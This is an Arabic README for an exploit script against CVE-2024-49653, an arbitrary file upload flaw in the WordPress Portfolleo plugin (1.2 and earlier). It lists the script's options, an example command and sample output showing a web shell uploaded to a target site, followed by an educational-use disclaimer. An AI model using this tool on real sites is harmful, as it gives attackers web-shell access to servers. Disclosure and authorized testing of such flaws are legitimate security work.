
إضافة Portfolleo في WordPress <= 1.2 - ثغرة رفع ملفات تعسفي
العنوان: إضافة Portfolleo لووردبريس <= 1.2 - ثغرة رفع ملفات عشوائي
الوصف:
ثغرة رفع ملفات غير مقيد بنوع خطير في إضافة Portfolleo من James Eggers تسمح برفع قشرة ويب إلى خادم الويب. تؤثر هذه المشكلة على Portfolleo من الإصدار n/a حتى 1.2.
للمزيد:
درجة CVSS:
يستغل هذا السكربت ثغرة رفع الملفات العشوائي في إضافة Portfolleo لووردبريس (الإصدارات <= 1.2) لرفع قشرة ويب.
تحتاج إلى تثبيت ما يلي لتشغيل السكربت:
requestsbeautifulsoup4يمكنك تثبيت المكتبات المطلوبة باستخدام:
pip install requests beautifulsoup4
شغّل السكربت مع الخيارات التالية:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
إذا نجح السكربت، يجب أن ترى المخرجات التالية:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
هذا السكربت مخصص للأغراض التعليمية فقط. لا يقرّ المؤلف استخدام هذا السكربت في أنشطة غير قانونية. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.
بواسطة: Nxploited | Khaled Alenazi